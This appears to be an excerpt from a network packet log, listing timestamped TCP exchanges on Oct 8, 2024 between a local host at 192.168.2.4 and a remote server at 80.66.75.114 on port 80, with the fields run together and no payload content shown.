                                                            Oct 8, 2024 10:08:43.234915972 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.234950066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.234956980 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234956980 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234956980 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234957933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234957933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234957933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234987020 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235047102 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235054016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235054970 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235080957 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235115051 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235116959 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235141039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235148907 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235161066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235182047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235202074 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235225916 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235234976 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235270977 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235289097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235305071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235316038 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235338926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235353947 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235394955 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235425949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235461950 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235476017 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235496044 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235507011 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235528946 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235543966 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235562086 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235579014 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235595942 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235609055 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235630035 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235642910 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235663891 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235677004 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235698938 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235709906 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235749960 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235757113 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235790014 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235811949 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235822916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235833883 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235856056 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235872984 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235891104 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235908985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235924959 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235938072 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235959053 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.235975981 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.235995054 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.236007929 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.236028910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.236044884 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.236061096 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.236080885 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.236109018 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.236113071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.236148119 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.236165047 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.236181974 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.236196041 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.236231089 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318005085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318065882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318070889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318101883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318119049 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318136930 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318156958 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318170071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318187952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318243027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318259001 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318275928 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318303108 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318310976 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318320990 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318345070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318361044 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318380117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318397045 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318423986 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318430901 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318459034 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318478107 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318492889 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318506956 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318528891 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.318538904 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.318574905 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.365252972 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365304947 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365341902 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365350008 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.365350962 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.365431070 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.365658998 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365694046 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365710020 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.365731001 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365748882 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.365770102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.365931988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365967035 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365983009 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.366004944 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.366012096 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.366034985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.366054058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.366076946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456202984 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456329107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456367016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456402063 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456408024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456408978 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456434965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456469059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456485033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456485033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456485033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456504107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456511021 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456537962 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456557035 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456573963 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456588984 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456607103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456624985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456641912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456659079 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456676006 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456695080 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456710100 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456723928 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456743956 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456763029 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456780910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456792116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456834078 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.506460905 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506485939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506504059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506704092 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.506778002 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506795883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506813049 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506829977 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506903887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.506962061 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506979942 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506990910 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.506998062 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.507013083 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.507034063 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.507055044 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.507092953 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.546822071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.546940088 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597004890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597026110 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597104073 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597106934 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597152948 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597168922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597184896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597193003 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597201109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597213030 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597228050 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597244978 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597311020 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597327948 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597394943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597394943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597394943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597394943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597691059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597707033 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597723007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597748041 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597765923 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597781897 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597850084 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597901106 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.646656990 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646702051 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646725893 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646740913 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646749973 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.646755934 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646771908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646787882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646805048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646946907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.646946907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.646946907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.647062063 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.647113085 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.647253990 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.647270918 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.647305012 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.647326946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.687683105 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462713003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462718010 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462728024 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462766886 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462775946 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462786913 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462812901 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462825060 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462830067 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462862015 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462882042 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462884903 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462901115 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462937117 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462938070 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462944031 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462990999 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.463043928 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.463090897 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.554878950 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.554898977 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.554924965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.554997921 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555033922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555035114 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555035114 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555035114 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555049896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555094957 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555113077 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555113077 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555136919 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555198908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555214882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555255890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555260897 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555260897 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555272102 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555305958 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555342913 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555458069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555473089 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555514097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555515051 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555516005 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555530071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555566072 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555574894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555586100 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555622101 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555646896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555694103 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.602818966 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602837086 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602880001 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602896929 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602911949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602926970 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602943897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602968931 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603130102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.605948925 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.605966091 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.605992079 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.606008053 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.606018066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.606024027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.606039047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.606054068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.606070995 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.606091022 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.694346905 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694387913 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694397926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694413900 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694421053 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694428921 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694437027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694473982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694489002 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694505930 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694551945 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694569111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694580078 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.694617987 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.694757938 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694773912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694788933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694809914 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.694828987 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.740495920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740520954 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740536928 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740551949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740555048 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.740567923 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740582943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.740582943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.740582943 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740600109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740621090 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.740621090 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.740634918 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741309881 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741323948 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741338968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741353989 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741360903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741360903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741369009 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741383076 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741383076 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741384983 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741396904 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741401911 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741417885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741420031 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741430998 CEST4973080192.168.2.480.66.75.114
